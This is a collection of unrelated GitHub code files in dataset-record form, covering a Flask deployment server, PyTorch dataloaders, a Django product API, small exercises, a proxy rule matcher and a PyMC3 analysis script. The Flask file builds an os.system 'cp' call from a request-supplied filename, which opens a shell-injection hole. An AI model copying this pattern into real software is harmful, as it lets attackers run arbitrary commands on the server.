app.logger.error(\"No filename passed\")\n return \"No filename passed\", 400\n if filename is None:\n return \"No filename passed\", 400\n try:\n jsonInput = request.get_json(force=True)\n json_object_m = json.dumps(jsonInput, indent=4)\n name, file_ext = os.path.splitext(filename)\n # MAPBU-1694, whenever there is an existing deployment file, it needs to be saved, with _counter, so that user\n # can re-use them and new file saved with same name\n if os.path.isfile(filename):\n i = 1\n while os.path.isfile(f\"{name}_{i}{file_ext}\"):\n i += 1\n new_filename = f\"{name}_{i}{file_ext}\"\n os.system(f\"cp {filename} {new_filename}\")\n with open(filename, \"w\") as outfile:\n outfile.write(json_object_m)\n except Exception as e:\n app.logger.error(\"Failed to generate the json file \" + str(e))\n d = {\"responseType\": \"ERROR\", \"msg\": \"Failed to generate the json file \" + str(e), \"STATUS_CODE\": 500}\n return jsonify(d), 500\n app.logger.info(\"Successfully generated input file\")\n d = {\"responseType\": \"SUCCESS\", \"msg\": \"Successfully generated input file\", \"STATUS_CODE\": 200}\n return jsonify(d), 200\n\n\n@app.route(\"/api/tanzu/logbundle\", methods=[\"GET\"])\n@token_required\ndef download_log_bundle(current_user):\n path = \"/var/log/server\"\n app.logger.info(f\"*************Downloading log files {path}************\")\n if not 
os.path.isdir(\"/tmp/logbundle\"):\n command = [\"mkdir\", \"/tmp/logbundle\"]\n runShellCommandAndReturnOutputAsList(command)\n zip_path = \"/tmp/logbundle/service_installer_log_bundle.zip\"\n with ZipFile(zip_path, \"w\") as newzip:\n for folderName, subfolders, filenames in os.walk(path):\n for filename in filenames:\n # create complete filepath of file in directory\n filePath = os.path.join(folderName, filename)\n # Add file to zip\n newzip.write(filePath, basename(filePath))\n return send_file(zip_path, as_attachment=True)\n\n\nif __name__ == \"__main__\":\n FlaskInjector(app=app, modules=[configure])\n from waitress import serve\n\n serve(app, port=5000)\n","repo_name":"vmware-tanzu/service-installer-for-vmware-tanzu","sub_path":"src/python_server.py","file_name":"python_server.py","file_ext":"py","file_size_in_byte":15442,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"72"} +{"seq_id":"39010196390","text":"#!/usr/bin/env python3\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport numbers\nimport math\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\nimport torchvision\nfrom torchvision import transforms\n\nclass FlowDataset(Dataset):\n \"\"\"Flow Attention Dataset.\n \n Args:\n labels_path (string): path to text file with annotations\n transform (callable): transform to be applied on image\n\n Returns:\n torch.utils.data.Dataset: dataset object\n \"\"\"\n\n def __init__(self, labels_path, transform=None):\n # read video path and labels\n with open(labels_path, 'r') as f:\n data = f.read()\n data = data.split()\n data = np.array(data)\n data = np.reshape(data, (-1, 2))\n\n np.random.shuffle(data)\n self.data = data\n self.transform = transform\n\n def __len__(self):\n \"\"\"\n Retrieve Dataset Length.\n \"\"\"\n return len(self.data)\n\n def __getitem__(self, idx):\n \"\"\"\n Retrieve Next Item in Dataset.\n\n @return sample: sample['X'] contains input data while sample['y']\n contains attention label.\n \"\"\"\n video_path = self.data[idx, 0]\n # change to flow dataset\n video_path_flow = video_path[:45] + '_flow' + video_path[45:]\n y = int(self.data[idx, 1]) - 1\n X_flow = np.load(video_path_flow)\n # transform data\n if self.transform:\n X_flow = self.transform(X_flow)\n\n # reformat [numSeqs x numChannels x Height x Width]\n X_flow = np.transpose(X_flow, (0,3,1,2))\n # store in sample\n sample = {'X': X_flow, 'y': y}\n return sample\n\nclass TwostreamDataset(Dataset):\n \"\"\"Twostream Attention Dataset.\n \n Args:\n labels_path (string): path to text file with annotations\n transform (callable): transform to be applied on image\n\n Returns:\n torch.utils.data.Dataset: dataset for raw image frames and ``flow\n images.``\n \"\"\"\n\n def __init__(self, labels_path, transform=None):\n # read video path and labels\n with open(labels_path, 'r') as f:\n data = f.read()\n data = data.split()\n data = np.array(data)\n data = np.reshape(data, (-1, 2))\n\n np.random.shuffle(data)\n self.data = data\n self.transform = transform\n\n def __len__(self):\n \"\"\"\n Retrieve Dataset Length.\n \"\"\"\n return len(self.data)\n\n def __getitem__(self, idx):\n \"\"\"\n Retrieve Next Item in Dataset.\n\n @return sample: sample['X'] contains input data while sample['y']\n contains attention label.\n \"\"\"\n video_path = self.data[idx, 0]\n # change to flow dataset\n video_path_flow = video_path[:45] + '_flow' + video_path[45:]\n y = 
int(self.data[idx, 1]) - 1\n        X = np.load(video_path)\n        X_flow = np.load(video_path_flow)\n        # transform data\n        if self.transform:\n            X = self.transform(X)\n            X_flow = self.transform(X_flow)\n\n        # combine into one stream (remove first sequence of appearance feats)\n        X = X[1:]\n        X_combine = np.vstack((X, X_flow))\n        # reformat [numSeqs x numChannels x Height x Width]\n        X = np.transpose(X_combine, (0,3,1,2))\n        # store in sample\n        sample = {'X': X, 'y': y}\n        return sample\n\nclass AttentionDataset(Dataset):\n    \"\"\"Attention Level Dataset.\n\n    Args:\n        labels_path (string): path to text file with annotations\n        transform (callable): transform to be applied on image\n\n    Returns:\n        torch.utils.data.Dataset: dataset object\n    \"\"\"\n\n    def __init__(self, labels_path, transform=None):\n        # read video paths and labels\n        with open(labels_path, 'r') as f:\n            data = f.read()\n        data = data.split()\n        data = np.array(data)\n        data = np.reshape(data, (-1, 2))\n\n        np.random.shuffle(data)\n        self.data = data\n        self.transform = transform\n\n    def __len__(self):\n        return len(self.data)\n\n    def __getitem__(self, idx):\n        video_path = self.data[idx, 0]\n        y = int(self.data[idx, 1]) - 1\n        X = np.load(video_path)\n        # transform data in place so X_sample is defined even without a transform\n        if self.transform:\n            X = self.transform(X)\n\n        # reformat [numSeqs x numChannels x Height x Width]\n        X_sample = np.transpose(X, (0,3,1,2))\n        # store in sample\n        sample = {'X': X_sample, 'y': y}\n        return sample\n\nclass Resize():\n    \"\"\"Resize frames in video sequence to a given size.\n\n    Args:\n        output_size (tuple): Desired output size.\n    \"\"\"\n    def __init__(self, output_size):\n        assert isinstance(output_size, tuple)\n        self.output_size = output_size\n\n    def __call__(self, video):\n        \"\"\"\n        Args:\n            video (ndarray): Video to be resized.\n\n        Returns:\n            ndarray: Resized video.\n        \"\"\"\n        video_new = np.zeros(\n            (len(video), *self.output_size, video.shape[3]),\n            dtype=np.uint8\n        )\n        # resize each frame\n        for idx, frame in enumerate(video):\n            video_new[idx] = cv2.resize(frame, self.output_size)\n\n        return video_new\n\nclass CenterCrop():\n    \"\"\"Crop frames in video sequence at the center.\n\n    Args:\n        output_size (tuple): Desired output size of crop.\n    \"\"\"\n\n    def __init__(self, output_size):\n        assert isinstance(output_size, tuple)\n        self.output_size = output_size\n\n    def __call__(self, video):\n        \"\"\"\n        Args:\n            video (ndarray): Video to be center-cropped.\n\n        Returns:\n            ndarray: Center-cropped video.\n        \"\"\"\n        # hold transformed video\n        video_new = np.zeros(\n            (video.shape[0], *self.output_size, video.shape[3]),\n            dtype=video.dtype\n        )\n        h, w = video.shape[1:3]\n        new_h, new_w = self.output_size\n        top = (h - new_h) // 2\n        left = (w - new_w) // 2\n        # center crop each frame\n        for idx, frame in enumerate(video):\n            video_new[idx] = frame[top: top + new_h, left: left + new_w]\n\n        return video_new\n\nclass RandomCrop():\n    \"\"\"Crop randomly the frames in a video sequence.\n\n    Args:\n        output_size (tuple): Desired output size.\n    \"\"\"\n    def __init__(self, output_size):\n        assert isinstance(output_size, tuple)\n        self.output_size = output_size\n\n    def __call__(self, video):\n        \"\"\"\n        Args:\n            video (ndarray): Video to be cropped.\n\n        Returns:\n            ndarray: Cropped video.\n        \"\"\"\n        # hold transformed video\n        video_new = np.zeros(\n            (video.shape[0], *self.output_size, video.shape[3]),\n            dtype=video.dtype\n        )\n        h, w = video.shape[1:3]\n        new_h, new_w = self.output_size\n        # +1 keeps the high end inclusive (and avoids a crash when h == new_h)\n        top = np.random.randint(0, h - new_h + 1)\n        left = np.random.randint(0, w - new_w + 1)\n        # randomly crop each frame\n        for idx, frame in enumerate(video):\n            video_new[idx] = frame[top: top + new_h, left: left + new_w]\n\n        return video_new\n\n
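# Usage sketch (added; shapes are illustrative, not from the original repo):\n# composing these transforms as get_loaders() does further below.\n#   tf = transforms.Compose([Resize((256, 256)), RandomCrop((224, 224))])\n#   clip = np.zeros((16, 300, 400, 3), dtype=np.uint8)  # frames, H, W, C\n#   tf(clip).shape  # -> (16, 224, 224, 3)\n\n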
class RandomHorizontalFlip():\n    \"\"\"Horizontally flip a video sequence.\n\n    Args:\n        p (float): Probability of image being flipped. Default value is 0.5.\n    \"\"\"\n    def __init__(self, p=0.5):\n        self.p = p\n\n    def __call__(self, video):\n        \"\"\"\n        Args:\n            video (ndarray): Video to be flipped.\n\n        Returns:\n            ndarray: Randomly flipped video.\n        \"\"\"\n        # check to perform flip\n        if random.random() < self.p:\n            # hold transformed video\n            video_new = np.zeros_like(video)\n            # flip each frame\n            for idx, frame in enumerate(video):\n                video_new[idx] = cv2.flip(frame, 1)\n\n            return video_new\n\n        return video\n\nclass RandomRotation():\n    \"\"\"Rotate video sequence by an angle.\n\n    Args:\n        degrees (float or int): Range of degrees to select from.\n    \"\"\"\n\n    def __init__(self, degrees):\n        assert isinstance(degrees, numbers.Real)\n        self.degrees = degrees\n\n    def __call__(self, video):\n        \"\"\"\n        Args:\n            video (ndarray): Video to be rotated.\n\n        Returns:\n            ndarray: Randomly rotated video.\n        \"\"\"\n        # hold transformed video\n        video_new = np.zeros_like(video)\n        h, w = video.shape[1:3]\n        # random rotation\n        angle = np.random.uniform(-self.degrees, self.degrees)\n        # create rotation matrix with center point at the center of frame\n        M = cv2.getRotationMatrix2D((w//2,h//2), angle, 1)\n        # rotate each frame\n        for idx, frame in enumerate(video):\n            video_new[idx] = cv2.warpAffine(frame, M, (w,h))\n\n        return video_new\n\nclass Normalize():\n    \"\"\"Normalize video with mean and standard deviation.\n    Given mean: ``(M1,...,Mn)`` and std: ``(S1,..,Sn)`` for ``n`` channels, this\n    transform will normalize each channel of the input video.\n\n    Args:\n        mean (list): Sequence of means for each channel.\n        std (list): Sequence of standard deviations for each channel.\n    \"\"\"\n\n    def __init__(self, mean, std):\n        assert isinstance(mean, list)\n        assert isinstance(std, list)\n        self.mean = np.array(mean, dtype=np.float32)\n        self.std = np.array(std, dtype=np.float32)\n        # reverse order since images are read with opencv (i.e. BGR)\n        self.mean = np.flip(self.mean, 0)\n        self.std = np.flip(self.std, 0)\n
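        # e.g. the ImageNet means [0.485, 0.456, 0.406] (RGB) become\n        # [0.406, 0.456, 0.485] after the flip, matching OpenCV's BGR order\n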
\n    def __call__(self, video):\n        \"\"\"\n        Args:\n            video (ndarray): Video to be normalized\n\n        Returns:\n            ndarray: Normalized video.\n        \"\"\"\n        video = video / 255\n        video = (video - self.mean) / self.std\n        video = np.asarray(video, dtype=np.float32)\n        return video\n\ndef get_loaders(labels_path, datatype, batch_size, num_workers, gpu=True):\n    \"\"\"Return dictionary of torch.utils.data.DataLoader.\n\n    Args:\n        labels_path (string): path to text file with annotations\n        datatype (string): dataset being used ('flow', 'raw' or 'twostream')\n        batch_size (int): number of instances in batch\n        num_workers (int): number of subprocesses used for data loading\n        gpu (bool): presence of gpu (default is true)\n\n    Returns:\n        torch.utils.data.DataLoader: dataloader for custom dataset\n        dictionary: dataset lengths for training and validation\n    \"\"\"\n    # data augmentation and normalization for training\n    # just normalization for validation\n    data_transforms = {\n        'Train': transforms.Compose([\n            Resize((256,256)),\n            RandomCrop((224,224)),\n            RandomHorizontalFlip(),\n            RandomRotation(15),\n            Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n        ]),\n        'Valid': transforms.Compose([\n            Resize((256,256)),\n            CenterCrop((224,224)),\n            Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n        ])\n    }\n\n    # create dataset object\n    if datatype == 'flow':\n        datasets = {x: FlowDataset(\n            labels_path, data_transforms[x]\n        ) for x in ['Train', 'Valid']}\n    elif datatype == 'raw':\n        datasets = {x: AttentionDataset(\n            labels_path, data_transforms[x]\n        ) for x in ['Train', 'Valid']}\n    elif datatype == 'twostream':\n        datasets = {x: TwostreamDataset(\n            labels_path, data_transforms[x]\n        ) for x in ['Train', 'Valid']}\n    else:\n        raise ValueError('unknown datatype: ' + str(datatype))\n\n    # random split for training and validation\n    num_instances = len(datasets['Train'])\n    indices = list(range(num_instances))\n    split = math.floor(num_instances * 0.8)\n    train_indices, valid_indices = indices[:split], indices[split:]\n    samplers = {'Train': SubsetRandomSampler(train_indices),\n                'Valid': SubsetRandomSampler(valid_indices)}\n\n    # dataset sizes\n    dataset_sizes = {'Train': len(train_indices),\n                     'Valid': len(valid_indices)}\n\n    # create dataloaders\n    dataloaders = {\n        x: DataLoader(datasets[x],\n                      batch_size=batch_size, sampler=samplers[x],\n                      num_workers=num_workers, pin_memory=gpu)\n        for x in ['Train', 'Valid']\n    }\n    return dataloaders, dataset_sizes\n
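\n# Usage sketch (added; the labels path here is hypothetical):\n#   loaders, sizes = get_loaders('labels.txt', 'raw', batch_size=32,\n#                                num_workers=2, gpu=torch.cuda.is_available())\n#   batch = next(iter(loaders['Train']))  # batch['X'], batch['y']\n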
\ndef main():\n    \"\"\"Main Function.\"\"\"\n    import time\n\n    # hyperparameters\n    labels_path = '/usr/local/faststorage/gcorc/accv/average_labels.txt'\n    batch_size = 32\n    num_workers = 2\n    gpu = torch.cuda.is_available()\n\n    dataset = TwostreamDataset(labels_path)\n    for i in range(len(dataset)):\n        sample = dataset[i]\n        data = sample['X']\n        print(data.shape)\n        if i == 0:\n            break\n\n#    # dictionary of dataloaders\n#    dataloaders, dataset_sizes = get_loaders(labels_path, 'twostream',\n#                                             batch_size, num_workers, gpu=True)\n#    print('Dataset Sizes:')\n#    print(dataset_sizes)\n#    print()\n#\n#    train_batch = next(iter(dataloaders['Train']))\n#    data, labels = train_batch['X'], train_batch['y']\n#    print(data.size())\n\nif __name__ == '__main__':\n    main()\n","repo_name":"gcorcorann/ComputerRobotVision","sub_path":"src/dataloader_nd.py","file_name":"dataloader_nd.py","file_ext":"py","file_size_in_byte":13609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"40617702549","text":"import os\n# ### Use these if project folder is different from module folder\n# revmpath = os.path.expanduser('~/path/to/project/folder/')\n# datapath = os.path.expanduser('~/path/to/project/folder/Data/')\n# ### Use these if project folder contains module folder\n# revmpath = os.path.dirname(os.path.abspath(__file__)).replace('pvvm','')\n# datapath = os.path.dirname(os.path.abspath(__file__)).replace('pvvm', 'Data/')\n########### CUSTOM ###########\nrevmpath = os.path.expanduser('~/Desktop/pvvmtest1/')\ndatapath = os.path.expanduser('~/Desktop/pvvmtest1/Data/')\n##############################\n\napikeys = {\n    ### Get a googlemaps API key at\n    ### https://developers.google.com/maps/documentation/geocoding/get-api-key\n    'googlemaps': 'yourAPIkey',\n    ### Get an NSRDB key at https://developer.nrel.gov/signup/\n    'nsrdb': 'yourAPIkey',\n}\nnsrdbparams = {\n    ### Use '+' for spaces\n    'full_name': 'your+name',\n    'email': 'your@email.com',\n    'affiliation': 'your+affiliation',\n    'reason': 'your+reason',\n    'mailing_list': 'true',\n}\n","repo_name":"patrickbrown4/pvvm_pvtos","sub_path":"pvvm/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"}
{"seq_id":"36978998814","text":"from keras.models import load_model\nimport pandas as pd\n\nmodel = load_model('HRD_using_cnn_opencv.h5')\n\n# NOTE (added): 'test' was undefined in the original script; the line below is\n# an assumption -- the Kaggle digit-recognizer test set reshaped for the CNN.\ntest = pd.read_csv('test.csv').values.reshape(-1, 28, 28, 1) / 255.0\n\npredictions = model.predict_classes(test, verbose=1)\npd.DataFrame({\"ImageId\":list(range(1,len(predictions)+1)),\n              \"Label\":predictions}).to_csv(\"KAGGLE_SUBMISSION_FILE\",\n                                           index=False,\n                                           header=True)","repo_name":"anwarshaikh078/Kaggle_Competitions","sub_path":"Digit Recognizer/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"23287089717","text":"\"\"\"View module for handling requests about products\"\"\"\nfrom django.http import HttpResponseServerError\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.response import Response\nfrom rest_framework import serializers\nfrom rest_framework import status\nfrom bangazonAPI.models import Product, ProductType\n\nclass ProductSerializer(serializers.HyperlinkedModelSerializer):\n    \"\"\"JSON serializer for products\n\n    Arguments:\n        serializers.HyperlinkedModelSerializer\n    \"\"\"\n    class Meta:\n        model = Product\n        url = serializers.HyperlinkedIdentityField(\n            view_name='products',\n            lookup_field='id'\n        )\n        fields = ('id', 'url', 'name', 'customer_id', 'customer', 'price', 'description','quantity', 'location', 'image_path', 'created_at', 'product_type_id', 'product_type')\n        depth = 3\n\n
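# note (added): depth=3 makes DRF expand related objects (customer,\n# product_type, ...) three levels deep instead of returning bare ids\n\n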
class Products(ViewSet):\n    \"\"\"Products for Bangazon\"\"\"\n    # handles GET all\n    def list(self, request):\n        \"\"\"Handle GET requests for all products\n\n        Returns:\n            Response -- JSON serialized product instance\n        \"\"\"\n        limit = self.request.query_params.get('limit')\n        category = self.request.query_params.get('category', None)\n        user = self.request.query_params.get('self')\n\n        location = self.request.query_params.get('location')\n\n        product_name = self.request.query_params.get('name')\n\n        # filter for the 'home' view\n        if limit:\n            products = Product.objects.order_by('-created_at')[0:int(limit)]\n        elif category is not None:\n            products = Product.objects.filter(product_type_id=category)\n        # filter for the 'myProducts' view\n        elif user == \"true\":\n            products = Product.objects.filter(customer_id=request.auth.user.customer.id)\n        else:\n            products = Product.objects.all()\n\n        # filters for search\n        if location is not None:\n            products = products.filter(location=location)\n\n        if product_name is not None:\n            products = products.filter(name=product_name)\n\n        serializer = ProductSerializer(\n            products,\n            many=True,\n            context={'request': request}\n        )\n\n        return Response(serializer.data)\n\n    # handles GET one\n    def retrieve(self, request, pk=None):\n        \"\"\"Handle GET requests for single product\n\n        Returns:\n            Response -- JSON serialized product instance\n        \"\"\"\n        try:\n            product = Product.objects.get(pk=pk)\n            serializer = ProductSerializer(product, context={'request': request})\n            return Response(serializer.data)\n        except Exception as ex:\n            return HttpResponseServerError(ex)\n\n    # handles POST\n    def create(self, request):\n        \"\"\"Handle POST operations\n\n        Returns:\n            Response -- JSON serialized Product instance\n        \"\"\"\n        newproduct = Product()\n        newproduct.customer_id = request.auth.user.customer.id\n        newproduct.name = request.data[\"name\"]\n        newproduct.price = request.data[\"price\"]\n        newproduct.description = request.data[\"description\"]\n        newproduct.quantity = request.data[\"quantity\"]\n        newproduct.location = request.data[\"location\"]\n        newproduct.image_path = request.data[\"image_path\"]\n        newproduct.product_type_id = request.data[\"product_type_id\"]\n\n        newproduct.save()\n\n        serializer = ProductSerializer(newproduct, context={'request': request})\n\n        return Response(serializer.data)\n\n    # handles DELETE\n    def destroy(self, request, pk=None):\n        \"\"\"Handle DELETE requests for a single product\n\n        Returns:\n            Response -- 200, 404, or 500 status code\n        \"\"\"\n        try:\n            productItem = Product.objects.get(pk=pk)\n            # restrict users to only being able to delete products they've created\n            if productItem.customer_id == request.auth.user.customer.id:\n                productItem.delete()\n\n                return Response({}, status=status.HTTP_204_NO_CONTENT)\n\n            return Response({'message': 'Cannot delete a product you do not own'}, status=status.HTTP_403_FORBIDDEN)\n\n        except Product.DoesNotExist as ex:\n            return Response({'message': ex.args[0]}, status=status.HTTP_404_NOT_FOUND)\n\n        except Exception as ex:\n            return Response({'message': ex.args[0]}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n    # handles PUT\n    def update(self, request, pk=None):\n        \"\"\"Handle PUT requests for a product\n\n        Returns:\n            Response -- Empty body with 204 status code\n        \"\"\"\n        productItem = Product.objects.get(pk=pk)\n        productItem.customer_id = request.auth.user.customer.id\n        productItem.name = request.data[\"name\"]\n        productItem.price = request.data[\"price\"]\n        productItem.description = request.data[\"description\"]\n        productItem.quantity = request.data[\"quantity\"]\n        productItem.location = request.data[\"location\"]\n        productItem.image_path = request.data[\"image_path\"]\n        productItem.product_type_id = request.data[\"product_type_id\"]\n        productItem.save()\n        return Response({}, status=status.HTTP_204_NO_CONTENT)\n","repo_name":"nss-cohort-36/bangazon-api-illin-illusionists-api","sub_path":"bangazonAPI/views/v_product.py","file_name":"v_product.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"38290911907","text":"movie = input()\r\n\r\nstudent_counter = 0\r\nstandard_counter = 0\r\nkids_counter = 0\r\n\r\nwhile movie != \"Finish\":\r\n    free_space = int(input())\r\n\r\n    current_people = 0\r\n\r\n    for t in range(0, free_space):\r\n        ticket_type = input()\r\n\r\n        if ticket_type == \"End\":\r\n            break\r\n\r\n        elif ticket_type == \"student\":\r\n            student_counter += 1\r\n\r\n
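        # tally each sold ticket by type for the end-of-run summary\r\n        elif 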
ticket_type == \"standard\":\r\n standard_counter += 1\r\n \r\n elif ticket_type == \"kid\":\r\n kids_counter += 1\r\n \r\n current_people += 1\r\n \r\n percentage = current_people / free_space * 100\r\n \r\n print(f'{movie} - {percentage:.2f}% full.')\r\n \r\n movie = input()\r\n \r\ntotal_tickets = kids_counter + student_counter + standard_counter\r\nstudent_percent = student_counter / total_tickets * 100\r\nstandard_percent = standard_counter / total_tickets * 100\r\nkids_percent = kids_counter / total_tickets * 100\r\n\r\nprint(f'Total tickets: {total_tickets}')\r\nprint(f'{student_percent:.2f}% student tickets.')\r\nprint(f'{standard_percent:.2f}% standard tickets.')\r\nprint(f'{kids_percent:.2f}% kids tickets.')\r\n","repo_name":"vkostoff/SoftUni_Python","sub_path":"Programming_Basics/Nested_Loops_Lab/cinema_tickets.py","file_name":"cinema_tickets.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14789952869","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def levelOrderBottom(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n if root == None:\n return []\n nodeQueue = []\n flag = 0\n loc = 0\n resultList = []\n nodeQueue.append(root)\n resultList.append([])\n resultList[0].append(root.val)\n print(resultList[0])\n while loc < len(nodeQueue):\n if nodeQueue[loc].left != None:\n nodeQueue.append(nodeQueue[loc].left)\n if nodeQueue[loc].right != None:\n nodeQueue.append(nodeQueue[loc].right)\n if flag == loc and len(nodeQueue)-1 != loc:\n resultList.append([])\n for i in range(flag+1,len(nodeQueue)):\n # print(nodeQueue[i].val)\n resultList[-1].append(nodeQueue[i].val)\n flag = len(nodeQueue)-1\n loc += 1\n resultList.reverse()\n return resultList","repo_name":"Heqingquan/Leetcode-python","sub_path":"Binary Tree Level Order Traversal II.py","file_name":"Binary Tree Level Order Traversal II.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14751781772","text":"import os.path\nfrom enum import Enum, auto\nfrom functools import cache\nfrom typing import Any, Optional\n\nfrom typing_extensions import Self\n\nfrom p3.defaults import RULES_FALLBACK, RULES_FILE\nfrom p3.utils.loggable import Loggable\nfrom p3.utils.override import override\nfrom p3.utils.serializable import SelfSerializable\n\n\nclass Rule(Enum):\n Block = auto()\n Direct = auto()\n Forward = auto()\n\n @classmethod\n def from_str(cls, s: str) -> Self:\n s = s.lower()\n if s == 'block':\n return cls(cls.Block)\n if s == 'direct':\n return cls(cls.Direct)\n if s == 'forward':\n return cls(cls.Forward)\n raise ValueError\n\n\nclass RuleMatcher(SelfSerializable, Loggable):\n rules_fallback: Rule\n rules_file: str\n rules: Optional[dict[str, Rule]]\n\n def __init__(\n self,\n rules_fallback: str = RULES_FALLBACK,\n rules_file: str = RULES_FILE,\n **kwargs,\n ):\n super().__init__(**kwargs)\n self.rules_fallback = Rule.from_str(rules_fallback)\n self.rules_file = rules_file\n self.rules = None\n\n @override(SelfSerializable)\n def to_dict(self) -> dict[str, Any]:\n return {\n 'rules_fallback': self.rules_fallback.name,\n 'rules_file': self.rules_file,\n }\n\n @classmethod\n @override(SelfSerializable)\n def from_dict(cls, obj: dict[str, Any]) -> Self:\n 
return cls(rules_fallback=obj.get('rules_fallback') or RULES_FALLBACK,\n                   rules_file=obj.get('rules_file') or RULES_FILE)\n\n    def load_rules(self, force: bool = False):\n        if not force and self.rules is not None:\n            return\n        if len(self.rules_file) == 0:\n            self.logger.info('skip load rules file')\n            return\n        if not os.path.exists(self.rules_file):\n            self.logger.warning('cannot find rules file: %s', self.rules_file)\n            return\n        self.rules = dict()\n        with open(self.rules_file) as f:\n            for line in f:\n                line = line.strip()\n                if len(line) == 0 or line[0] == '#':\n                    continue\n                try:\n                    rule, domain = line.split(maxsplit=1)\n                    if domain not in self.rules:\n                        self.rules[domain] = Rule.from_str(rule)\n                except Exception as e:\n                    self.logger.warning('exception while loading rule %s: %s',\n                                        line, e)\n        self.logger.debug('load %d rules', len(self.rules))\n\n    @cache\n    def match(self, domain: str) -> Rule:\n        if self.rules is None:\n            return self.rules_fallback\n        rule = self.rules.get(domain)\n        if rule is not None:\n            return rule\n        sp = domain.split('.', 1)\n        if len(sp) > 1:\n            return self.match(sp[1])\n        return self.rules_fallback\n","repo_name":"vhqr0/python-proxy-platform","sub_path":"p3/server/rulematcher.py","file_name":"rulematcher.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"18865835303","text":"import pymc3 as pm\nimport numpy as np\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport theano.tensor as tt\nfrom theano import shared\nimport pandas as pd\nfrom matplotlib import gridspec\nfrom sklearn.decomposition import PCA, KernelPCA\nfrom Plot_XZ import *\nfrom PCA import *\n\nnp.set_printoptions(precision=0, suppress=True)\nSavefig = 0  # controls whether figures are displayed/saved\n\nelec_data = pd.read_csv('XZmulti_6.csv')\n\n# count the test sites for the same company's product:\ncompanies_num = elec_data.counts.unique()\ncompanies = len(companies_num)  # companies = 7, i.e. 7 test sites in total\ncompany_lookup = dict(zip(companies_num, range(len(companies_num))))\ncompany = elec_data['company_code'] = elec_data.counts.replace(company_lookup).values  # adds a column to the XZsingal data\n# companys = elec_data.counts.values - 1  # equivalent to the two lines above\n\n# count the number of distinct companies\ncompany_ABC = elec_data.company.unique()\ncompaniesABC = len(company_ABC)  # companies = 7, i.e. 7 test sites in total\ncompany_lookup_ABC = dict(zip(company_ABC, range(len(company_ABC))))\ncompanyABC = elec_data['company_ABC'] = elec_data.company.replace(company_lookup_ABC).values  # adds a column to the XZsingal data\n# companys = elec_data.counts.values - 1  # equivalent to the two lines above\n# elec_count = elec_data.counts.values\n\n# add Gaussian noise to all the feature factors\nSNR = np.random.normal(0, 2, size=[len(elec_data.Year.values), 4])\n\n# feature-factor analysis\nelec_tem = elec_data.Tem.values + SNR[:, 0]  # observed temperature, x2\nelec_tem1 = (elec_tem - np.mean(elec_tem)) / np.std(elec_tem)\nelec_hPa = elec_data.hPa.values + SNR[:, 1]  # observed pressure, x3\nelec_hPa1 = (elec_hPa - np.mean(elec_hPa)) / np.std(elec_hPa)\nelec_RH = elec_data.RH.values + SNR[:, 2]  # observed relative humidity\nelec_RH1 = (elec_RH - np.mean(elec_RH)) / np.std(elec_RH)\nelec_Lux = elec_data.Lux.values + SNR[:, 3]  # observed illuminance\nelec_Lux1 = (elec_Lux - np.mean(elec_Lux)) / np.std(elec_Lux)\n\n\n# observation time and the other environmental conditions\nelec_year = elec_data.Year.values  # observed time, x1\nelec_year1 = (elec_year - np.mean(elec_year)) / np.std(elec_year)\ndata_cs_year = elec_year\n# data_cs_year[42:45] = 12\n# print(data_cs_year)\n\nelec_Pca = np.vstack((elec_tem1, elec_hPa1, elec_RH1, elec_Lux1)).T  # stack the features into one array\n# elec_Pca2 = np.vstack((elec_tem, elec_hPa, elec_RH, elec_Lux)).T  # stack the features into one array\n# 
np.savetxt('XZ_nomean.csv', elec_Pca2, delimiter = ',')\n# =============================================================================================\n# PCA dimensionality reduction to cut feature correlation; there are two ways to do\n# it, sklearn's built-in PCA and a hand-rolled routine (the latter commented out):\n# x, z= pcaa(elec_Pca); XX = np.array(x); ZZ = np.array(z)\n# the 4 features (temperature etc.) are reduced to 2 components with more than 99%\n# explained variance, which preserves enough information for the model\n# =============================================================================================\n# whitening gives every component the same variance and reduces correlation;\n# n_components controls how many components are kept\npca = PCA(n_components=2)\npca.fit(elec_Pca)\n# project the data into the reduced space; once fitted, transform() can be\n# applied to new inputs as well\nelec_Pca1 = pca.transform(elec_Pca)\nelec_Pca1 = np.array(elec_Pca1)\n\nelec_Pca_char1 = elec_Pca1[:, 0]  # reduced feature 1\nelec_Pca_char2 = elec_Pca1[:, 1]  # reduced feature 2\n# elec_Pca_char3 = elec_Pca1[:, 2]  # reduced feature 3\n# print(elec_Pca_char1)\nelec_data.Fault.values[48] = 2000\n# fault rate = faults / total measurements, used as the model's y; it is scaled\n# up by 100 to amplify the effect, so results must be scaled back down by 100\nelec_faults = 100 * (elec_data.Fault.values / elec_data.Nums.values)  # fault rate as an array\n# elec_faults1 = (elec_faults - np.mean(elec_faults)) / np.std(elec_faults)\n# elec_faults[25] = 3\n# elec_faults[39] = 5\n# elec_faults[53] = 3.8\n# print(elec_faults)\n# reshape the 